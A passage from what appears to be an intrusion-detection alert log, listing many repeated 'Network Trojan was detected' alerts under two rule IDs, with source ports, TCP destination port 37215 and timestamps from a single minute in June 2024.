                SID:2835222
                Source Port:54886
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.470649
                SID:2835222
                Source Port:47766
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.828251
                SID:2829579
                Source Port:41398
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.861409
                SID:2835222
                Source Port:44036
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.051692
                SID:2835222
                Source Port:50610
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.968928
                SID:2835222
                Source Port:52488
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.999262
                SID:2829579
                Source Port:60906
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.338717
                SID:2835222
                Source Port:47032
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.021800
                SID:2835222
                Source Port:57814
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.453695
                SID:2835222
                Source Port:37710
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.644624
                SID:2835222
                Source Port:50800
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.087308
                SID:2829579
                Source Port:48212
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.024340
                SID:2829579
                Source Port:59768
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.702648
                SID:2829579
                Source Port:33464
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.368561
                SID:2829579
                Source Port:59230
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.545113
                SID:2829579
                Source Port:49058
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.034104
                SID:2829579
                Source Port:56534
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.677881
                SID:2835222
                Source Port:49798
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.776406
                SID:2829579
                Source Port:42932
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.161469
                SID:2835222
                Source Port:53510
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.019701
                SID:2829579
                Source Port:35912
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.831479
                SID:2835222
                Source Port:42890
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.150938
                SID:2835222
                Source Port:42626
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.341681
                SID:2829579
                Source Port:43520
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.701150
                SID:2829579
                Source Port:51546
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.505250
                SID:2829579
                Source Port:57244
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.762682
                SID:2829579
                Source Port:52008
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.448182
                SID:2829579
                Source Port:48898
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.071778
                SID:2829579
                Source Port:48612
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.091143
                SID:2829579
                Source Port:33886
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.151935
                SID:2835222
                Source Port:54992
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.292945
                SID:2835222
                Source Port:50808
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.715014
                SID:2835222
                Source Port:41118
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.022055
                SID:2829579
                Source Port:57522
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.989916
                SID:2835222
                Source Port:59018
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.421792
                SID:2829579
                Source Port:54484
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.807485
                SID:2835222
                Source Port:41404
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.151627
                SID:2835222
                Source Port:48784
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.245248
                SID:2835222
                Source Port:53000
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.660750
                SID:2835222
                Source Port:38014
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.518478
                SID:2835222
                Source Port:43308
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.185647
                SID:2829579
                Source Port:44562
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.998732
                SID:2835222
                Source Port:35686
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.702843
                SID:2829579
                Source Port:55302
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.451841
                SID:2829579
                Source Port:52334
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.716792
                SID:2829579
                Source Port:48896
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.702693
                SID:2835222
                Source Port:49110
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.198889
                SID:2829579
                Source Port:45202
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.793133
                SID:2829579
                Source Port:36580
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.186053
                SID:2835222
                Source Port:42408
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.012502
                SID:2835222
                Source Port:46950
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.504616
                SID:2829579
                Source Port:42866
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.969427
                SID:2829579
                Source Port:58812
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.858826
                SID:2829579
                Source Port:58750
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.030533
                SID:2835222
                Source Port:58472
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.616416
                SID:2829579
                Source Port:38702
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.812896
                SID:2835222
                Source Port:59830
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.670685
                SID:2835222
                Source Port:54202
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.034892
                SID:2835222
                Source Port:37166
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.229617
                SID:2829579
                Source Port:39892
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.013636
                SID:2835222
                Source Port:40700
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.291915
                SID:2835222
                Source Port:56158
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.420988
                SID:2835222
                Source Port:49226
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.905240
                SID:2829579
                Source Port:33746
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.019508
                SID:2829579
                Source Port:54330
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.110731
                SID:2829579
                Source Port:39020
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.292875
                SID:2829579
                Source Port:33962
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.718205
                SID:2835222
                Source Port:58860
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.034827
                SID:2835222
                Source Port:53376
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.160744
                SID:2835222
                Source Port:48360
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.984970
                SID:2829579
                Source Port:57280
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.703993
                SID:2835222
                Source Port:46604
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.688259
                SID:2835222
                Source Port:41844
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.225398
                SID:2835222
                Source Port:51102
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.879261
                SID:2829579
                Source Port:58236
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.146815
                SID:2835222
                Source Port:43730
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.019805
                SID:2829579
                Source Port:36880
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.020942
                SID:2835222
                Source Port:50616
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.566362
                SID:2835222
                Source Port:46484
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.644713
                SID:2829579
                Source Port:41316
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.019739
                SID:2829579
                Source Port:51328
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.410710
                SID:2829579
                Source Port:33766
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.846956
                SID:2835222
                Source Port:50476
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.387122
                SID:2835222
                Source Port:36242
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.617438
                SID:2835222
                Source Port:41436
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.244854
                SID:2829579
                Source Port:51706
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.542286
                SID:2835222
                Source Port:36174
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.676514
                SID:2835222
                Source Port:52430
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.849136
                SID:2835222
                Source Port:52946
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.057542
                SID:2829579
                Source Port:50280
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.111082
                SID:2829579
                Source Port:48412
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.683026
                SID:2829579
                Source Port:45192
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.662043
                SID:2829579
                Source Port:58554
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.369069
                SID:2829579
                Source Port:39822
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.763577
                SID:2829579
                Source Port:46886
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.790376
                SID:2829579
                Source Port:38524
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.990010
                SID:2829579
                Source Port:39244
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.906035
                SID:2835222
                Source Port:37032
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.715042
                SID:2835222
                Source Port:58718
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.019009
                SID:2829579
                Source Port:51104
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.470410
                SID:2829579
                Source Port:57822
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.789478
                SID:2835222
                Source Port:58918
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.789083
                SID:2829579
                Source Port:41998
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.941702
                SID:2835222
                Source Port:39434
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.343524
                SID:2829579
                Source Port:45428
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.789788
                SID:2835222
                Source Port:60726
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.228515
                SID:2835222
                Source Port:35130
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.660691
                SID:2829579
                Source Port:52254
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.985345
                SID:2829579
                Source Port:48118
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.073605
                SID:2835222
                Source Port:36140
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.406833
                SID:2835222
                Source Port:48650
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.056659
                SID:2829579
                Source Port:37356
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.340216
                SID:2829579
                Source Port:50788
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.718500
                SID:2835222
                Source Port:50214
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.052120
                SID:2835222
                Source Port:52836
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.762916
                SID:2835222
                Source Port:35510
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.021334
                SID:2829579
                Source Port:48500
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.670472
                SID:2835222
                Source Port:57512
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.503544
                SID:2835222
                Source Port:38158
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.777158
                SID:2835222
                Source Port:33382
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.808400
                SID:2829579
                Source Port:54866
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.250697
                SID:2835222
                Source Port:55370
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.501235
                SID:2829579
                Source Port:46240
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.131881
                SID:2835222
                Source Port:50498
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.177813
                SID:2835222
                Source Port:49964
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.860328
                SID:2829579
                Source Port:58444
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.762466
                SID:2835222
                Source Port:35380
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.452010
                SID:2835222
                Source Port:44402
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.183688
                SID:2835222
                Source Port:37344
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.031791
                SID:2835222
                Source Port:55180
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.932681
                SID:2835222
                Source Port:46258
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.407392
                SID:2835222
                Source Port:50562
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.810730
                SID:2829579
                Source Port:51750
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.985991
                SID:2835222
                Source Port:44356
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.055217
                SID:2835222
                Source Port:47322
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.202949
                SID:2829579
                Source Port:38268
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.857803
                SID:2835222
                Source Port:52176
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.381828
                SID:2829579
                Source Port:43498
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.980513
                SID:2829579
                Source Port:47776
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.521709
                SID:2829579
                Source Port:50670
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.916265
                SID:2829579
                Source Port:41106
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.339923
                SID:2829579
                Source Port:39848
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.472697
                SID:2835222
                Source Port:33108
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.227453
                SID:2835222
                Source Port:56864
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.618401
                SID:2835222
                Source Port:60404
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:27.001211
                SID:2835222
                Source Port:33612
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.078752
                SID:2835222
                Source Port:49632
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.761142
                SID:2835222
                Source Port:39664
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.859467
                SID:2829579
                Source Port:56052
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.969373
                SID:2829579
                Source Port:53416
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.812329
                SID:2835222
                Source Port:35312
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.092872
                SID:2829579
                Source Port:46256
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.019276
                SID:2835222
                Source Port:43542
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.134003
                SID:2835222
                Source Port:45054
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.848595
                SID:2829579
                Source Port:51240
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.722507
                SID:2835222
                Source Port:34542
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.018051
                SID:2835222
                Source Port:49192
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.858558
                SID:2829579
                Source Port:52588
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.917438
                SID:2829579
                Source Port:59716
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.023910
                SID:2829579
                Source Port:54712
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.941366
                SID:2829579
                Source Port:56046
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.766660
                SID:2835222
                Source Port:38234
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.677223
                SID:2835222
                Source Port:40290
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.915980
                SID:2835222
                Source Port:46234
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.985821
                SID:2829579
                Source Port:48096
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.671405
                SID:2829579
                Source Port:35076
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.012895
                SID:2829579
                Source Port:42240
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.274168
                SID:2835222
                Source Port:49034
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.339034
                SID:2829579
                Source Port:38902
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.149713
                SID:2835222
                Source Port:32898
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.775566
                SID:2835222
                Source Port:45978
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.245432
                SID:2829579
                Source Port:41052
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.381791
                SID:2835222
                Source Port:55762
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.451018
                SID:2829579
                Source Port:53970
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.807074
                SID:2829579
                Source Port:36816
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.978113
                SID:2835222
                Source Port:57196
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.227184
                SID:2835222
                Source Port:42002
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.896328
                SID:2829579
                Source Port:42030
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.735273
                SID:2835222
                Source Port:50998
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.384380
                SID:2829579
                Source Port:54806
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.075299
                SID:2835222
                Source Port:60572
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.677689
                SID:2835222
                Source Port:51468
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.149252
                SID:2835222
                Source Port:38604
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.779137
                SID:2829579
                Source Port:36556
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.804723
                SID:2835222
                Source Port:52914
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.970816
                SID:2835222
                Source Port:55180
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.226953
                SID:2829579
                Source Port:40212
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.404738
                SID:2835222
                Source Port:54354
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.882201
                SID:2835222
                Source Port:48454
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.968185
                SID:2835222
                Source Port:51364
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.681251
                SID:2835222
                Source Port:35274
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.968926
                SID:2835222
                Source Port:60008
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.182621
                SID:2829579
                Source Port:49318
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.519463
                SID:2829579
                Source Port:60412
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.452242
                SID:2835222
                Source Port:46050
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.663450
                SID:2835222
                Source Port:48236
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.967482
                SID:2829579
                Source Port:35238
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.546178
                SID:2835222
                Source Port:53420
                Destination Port:37215
